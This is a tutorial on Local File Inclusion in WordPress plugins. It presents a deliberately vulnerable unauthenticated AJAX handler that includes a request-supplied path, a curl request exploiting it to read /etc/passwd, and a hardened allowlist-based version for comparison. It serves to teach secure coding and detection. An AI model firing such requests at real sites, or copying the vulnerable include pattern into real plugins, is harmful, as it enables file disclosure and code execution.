Local File Inclusion (LFI)


This article covers cases of possible LFI on WordPress. This includes improper file inclusion inside a plugin or theme, where a request-controlled value reaches an include statement. Because PHP executes whatever PHP code it finds in an included file, such a bug can be used to read local files and, when an attacker can place PHP code in any file on the server (for example through an upload or a poisoned log), to gain RCE.

Useful Functions

Several PHP functions and language constructs could be useful to identify a possible LFI vulnerability. Each of them loads a file and executes the PHP code it contains, so a user-controlled argument to any of them is a candidate finding: include, include_once, require, require_once.

Example Cases

Below is an example of vulnerable code. The wp_ajax_nopriv_ prefix registers the handler for unauthenticated requests, and the template path is taken directly from the request and passed to include without any validation:

<?php
// Registered on the "nopriv" hook, so no login is required to reach it.
add_action("wp_ajax_nopriv_render_lesson", "render_lesson_template");
function render_lesson_template(){
    // Attacker-controlled value straight from the query string.
    $template_path = urldecode( $_GET['template_path'] ?? '' );
    // Intended to load a custom lesson template; includes any file on disk.
    include $template_path;
}

To exploit this, any unauthenticated user just needs to send a request to the /wp-admin/admin-ajax.php endpoint with the action parameter set to render_lesson and the template_path parameter in the query string (the handler reads it from $_GET, so it must be passed as a GET parameter even though admin-ajax.php also accepts POST). The file named in template_path is then passed to include and its contents are returned in the response.

curl '<WORDPRESS_BASE_URL>/wp-admin/admin-ajax.php?action=render_lesson&template_path=/etc/passwd'
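For comparison, here is an added example (not code from the original article or from any real plugin) that places the vulnerable handler above next to a hardened version. The plugin layout, the template names and the "template" parameter are assumptions chosen for illustration; the WordPress functions used (sanitize_key, plugin_dir_path, wp_send_json_error, wp_die, add_action) are the standard ones.

```php
<?php
// Added example, not from the original article. The plugin layout, hook and
// template names below are assumptions made for illustration.

// Vulnerable: the request decides which file PHP includes. Any readable file
// (/etc/passwd) is disclosed, and any file an attacker can write PHP into
// (an uploaded "image", a poisoned log) is executed.
function render_lesson_template_vulnerable() {
    $template_path = urldecode( $_GET['template_path'] ?? '' );
    include $template_path;
}

// Hardened: the request only supplies a key into an allowlist, the file is
// resolved under the plugin's own templates directory, and the resolved path
// is checked to still be inside that directory before it is included.
function render_lesson_template_hardened() {
    // Hypothetical allowlist of templates shipped with the plugin.
    $templates = array(
        'default' => 'lesson-default.php',
        'video'   => 'lesson-video.php',
    );

    // sanitize_key() reduces the value to [a-z0-9_-], so no slashes,
    // dots or null bytes survive even before the allowlist lookup.
    $key = sanitize_key( $_GET['template'] ?? 'default' );
    if ( ! isset( $templates[ $key ] ) ) {
        wp_send_json_error( 'unknown template', 400 ); // calls wp_die()
    }

    $base = realpath( plugin_dir_path( __FILE__ ) . 'templates' );
    $file = realpath( $base . DIRECTORY_SEPARATOR . $templates[ $key ] );

    // Containment check: realpath() collapses ../ and resolves symlinks, so a
    // path outside the templates directory can never pass this comparison.
    if ( false === $base || false === $file
        || 0 !== strpos( $file, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'template not found', 404 );
    }

    include $file;
    wp_die();
}

// Only the authenticated hook is registered. If unauthenticated users never
// need this endpoint, not registering wp_ajax_nopriv_ at all removes the
// attack surface entirely.
add_action( 'wp_ajax_render_lesson', 'render_lesson_template_hardened' );
```

With the hardened handler, the request above (template_path=/etc/passwd) is ignored because that parameter is never read, and a request such as ?action=render_lesson&template=../../wp-config.php is rejected at the allowlist step. The realpath containment check is kept as a second layer so that a later change to how the allowlist is built cannot silently reopen the traversal.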

Below are some of the findings related to Local File Inclusion: